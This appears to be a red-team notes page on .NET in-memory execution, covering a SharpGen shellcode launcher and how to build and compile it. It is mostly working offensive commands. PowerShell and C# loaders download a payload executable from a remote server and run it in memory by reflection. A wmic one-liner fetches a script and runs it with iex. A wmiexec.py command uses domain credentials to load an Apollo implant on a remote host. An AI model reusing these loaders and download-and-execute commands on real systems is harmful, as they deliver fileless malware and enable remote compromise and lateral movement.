Notes on .Net in memory execution and shellcode loading

This is a SharpGen compatible shellcode launcher C# code snippet

var shellcode = Convert.FromBase64String("shellcode_here");
ShellCode.ShellCodeExecute(shellcode);

Build SharpGen, which we use to create the .Net shellcode launcher. You may need to update the .Net Core framework version in the project to a more modern version

git clone https://github.com/cobbr/SharpGen
cd SharpGen
dotnet build

Once compiled, you can run SharpGen like so to compile the shellcode launcher code into a .Net assembly

dotnet bin/Debug/netcoreapp2.1/SharpGen.dll -f payload.exe -s source.txt -c Shell -d net40 

The following is a powershell script to load the shellcode executable generated using SharpGen using reflection

$bytes = (new-object net.webclient).downloaddata("http://server:port/payload.exe")
[System.Reflection.Assembly]::Load($bytes)
$BindingFlags = [Reflection.BindingFlags] "NonPublic,Static"
$main = [Shell].getmethod("Main", $BindingFlags)
$main.Invoke($null, $null)

This is how you can do the same thing in C# (taken from here)

// Added for modern https support
ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls11 | SecurityProtocolType.Tls12;
WebClient w = new System.Net.WebClient();
byte[] rd = w.DownloadData("http://server:port/payload.exe");
Assembly aas = Assembly.Load(rd);
MethodInfo m = aas.EntryPoint;    
m.Invoke(null, null);

If you are running an assembly with parameters in the entrypoint, invoke like so where p is string[] of params (can be empty)

object[] parameters = new[] { p };
m.Invoke(null, parameters);

You can use wmic to launch a powershell script from a web source

wmic process call create "powershell iex(new-object net.webclient).downloadstring('http://host:port/script.ps1')"

The following is an example of doing a reflection based load of apollo

wmiexec.py DOMAIN/[email protected] "powershell [System.Reflection.Assembly]::Load((new-object net.webclient).downloaddata('http://192.168.1.214/Apollo_new.exe')).EntryPoint.Invoke(\$null, @(\$null))"

Another x64 shellcode launcher here

Can compile something like so, specifying x64 as the platform

csc /platform:x64 /out:sc.exe x64_shellcode_loader.cs

Other random .Net command line related commands with switches

nuget restore SweetPotato.sln
msbuild /p:Configuration=Release
csc /langversion:4.0 /platform:x64 /out:ps1 ps_test.cs